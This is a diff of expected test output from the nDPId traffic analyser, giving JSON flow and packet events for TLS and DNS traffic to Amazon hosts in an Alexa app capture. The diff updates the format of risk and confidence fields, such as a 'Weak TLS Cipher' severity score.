-01518{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2631,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976177412,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"ts_msec":1490976177412,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}}
+01625{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2628,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976177411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"ts_msec":1490976177411,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}}
+01625{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2631,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976177412,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"ts_msec":1490976177412,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}}
 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2632,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_packet_id":3,"flow_last_seen":1490976177416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976177416,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoZihAAEAGqh6sECrYNu8cssZvAbuB1uWpMeRpe1AQAVe46QAA"}
-00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2637,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976177276,"flow_last_seen":1490976177419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1490976177419,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-01518{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2644,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177276,"flow_last_seen":1490976177553,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"ts_msec":1490976177553,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}}
+00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2637,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976177276,"flow_last_seen":1490976177419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1490976177419,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+01625{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2644,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177276,"flow_last_seen":1490976177553,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"ts_msec":1490976177553,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2670,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_packet_id":2,"flow_last_seen":1490976178110,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976178110,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8lfxAAEAGejasECrYNu8cssZuAbts9RaEAAAAAKAC\/\/9M+QAAAgQFtAQCCAoA9oPjAAAAAAEDAwg="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2672,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_packet_id":3,"flow_last_seen":1490976178284,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976178284,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAww9ZAAOcGpWc27xyyrBAq2AG7xm5KXM+cbPUWhXASH\/7T5AAAAgQFtAEDAwY="}
 00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2680,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1490976180796,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"ts_msec":1490976180796,"pkt":"AQBeAAABAMDKkaPvCABGwAAgAABAAAECBBcAAAAA4AAAAZQEAAARZO6bAAAAAA=="}
 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":33,"flow_first_seen":1490976064452,"flow_last_seen":1490976068180,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":17572,"flow_avg_l4_payload_len":532,"midstream":0,"ts_msec":1490976186164,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1490976064328,"flow_last_seen":1490976064897,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5630,"flow_avg_l4_payload_len":268,"midstream":0,"ts_msec":1490976186164,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00654{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976093238,"flow_last_seen":1490976093355,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976186164,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
-00659{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976090796,"flow_last_seen":1490976090982,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1490976186164,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00680{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976093238,"flow_last_seen":1490976093355,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976186164,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
+00685{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976090796,"flow_last_seen":1490976090982,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1490976186164,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976186164,"flow_last_seen":1490976186164,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976186164,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1490976186164,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976186164,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8hhtAAEAGihesECrYNu8cssZwAbtODwEcAAAAAKAC\/\/9+IQAAAgQFtAQCCAoA9ocHAAAAAAEDAwg="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2682,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_packet_id":2,"flow_last_seen":1490976186394,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976186394,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwCmJAAOcGXtw27xyyrBAq2AG7xnDcplSHTg8BHXASH\/7w+wAAAgQFtAEDAwY="}
 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2683,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_packet_id":3,"flow_last_seen":1490976186398,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976186398,"pkt":"AMDKkaPvePiC0\/vCCABFAAAohhxAAEAGiiqsECrYNu8cssZwAbtODwEd3KZUiFAQAVc7bQAA"}
-00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2684,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976186164,"flow_last_seen":1490976186398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1490976186398,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-01518{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2687,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976186164,"flow_last_seen":1490976186551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"ts_msec":1490976186551,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}}
+00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2684,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976186164,"flow_last_seen":1490976186398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1490976186398,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+01625{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2687,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976186164,"flow_last_seen":1490976186551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"ts_msec":1490976186551,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2698,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976186818,"flow_last_seen":1490976186818,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1490976186818,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":8669,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2698,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1490976186818,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":99,"pkt_l4_len":65,"ts_msec":1490976186818,"pkt":"AMDKkaPvePiC0\/vCCABFAABVWmJAAEARMzysECrYrBAqASHdADUAQT24ItEBAAABAAAAAAAAD21vYmlsZWFuYWx5dGljcwl1cy1lYXN0LTEJYW1hem9uYXdzA2NvbQAAAQAB"}
-00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2698,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976186818,"flow_last_seen":1490976186818,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1490976186818,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":8669,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2698,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976186818,"flow_last_seen":1490976186818,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1490976186818,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":8669,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2701,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_packet_id":2,"flow_last_seen":1490976186879,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"ts_msec":1490976186879,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl6vpAAEARopOsECoBrBAq2AA1Id0AUTsIItGBgAABAAEAAAAAD21vYmlsZWFuYWx5dGljcwl1cy1lYXN0LTEJYW1hem9uYXdzA2NvbQAAAQABwAwAAQABAAAAIgAENu8XXg=="}
-00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2701,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976186818,"flow_last_seen":1490976186879,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1490976186879,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":8669,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.23.94"}}
